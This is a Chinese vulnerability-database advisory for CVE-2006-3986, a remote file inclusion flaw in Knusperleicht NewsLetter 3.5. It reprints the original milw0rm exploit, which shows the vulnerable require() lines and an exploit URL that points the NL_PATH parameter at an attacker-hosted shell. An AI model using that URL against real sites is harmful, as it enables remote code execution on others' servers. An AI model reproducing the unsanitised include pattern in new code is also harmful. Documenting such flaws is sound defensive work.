Knusperleicht NewsLetter 'Index.PHP' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110734 漏洞类型 输入验证
发布时间 2006-08-01 更新时间 2006-08-08
CVE编号 CVE-2006-3986 CNNVD-ID CNNVD-200608-053
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2097
https://cxsecurity.com/issue/WLB-2006080037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-053
|漏洞详情
Newsletter3.5及早期版本的index.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助NL_PATH参数中的URL执行任意PHP代码。
|漏洞EXP
#=================================================================
#NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 3.5                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#      /**
# *     Erforderliche Datein einbinden
# */
#
#      require ("$NL_PATH"."inc/config.inc.php");
#      require ("$NL_PATH"."inc/engine.inc.php");
#
#/**
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?NL_PATH=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer

# milw0rm.com [2006-08-01]
|参考资料

来源:XF
名称:newsletter-index-file-include(28109)
链接:http://xforce.iss.net/xforce/xfdb/28109
来源:BID
名称:19267
链接:http://www.securityfocus.com/bid/19267
来源:BUGTRAQ
名称:20060801NewsLetterv3.5<=(NL_PATH)RemoteFileInclusionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/441807/100/0/threaded
来源:MILW0RM
名称:2097
链接:http://www.milw0rm.com/exploits/2097
来源:VUPEN
名称:ADV-2006-3093
链接:http://www.frsirt.com/english/advisories/2006/3093
来源:SECUNIA
名称:21314
链接:http://secunia.com/advisories/21314
来源:SREASON
名称:1328
链接:http://securityreason.com/securityalert/1328
来源:MILW0RM
名称:2097
链接:http://milw0rm.com/exploits/2097